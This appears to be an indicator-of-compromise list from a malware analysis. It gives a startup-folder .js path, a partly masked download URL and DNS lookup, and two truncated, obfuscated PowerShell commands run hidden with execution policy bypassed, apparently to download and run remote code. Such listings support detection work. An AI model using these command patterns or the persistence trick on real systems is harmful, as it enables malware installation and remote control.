Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.js
- http://pa##e.ee/r/0vv55
- DNS ASK pa##e.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' PowERsHELl -nOp -w Hidden -ep byPAsS /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAd...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nOp -w Hidden -ep byPAsS /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABd...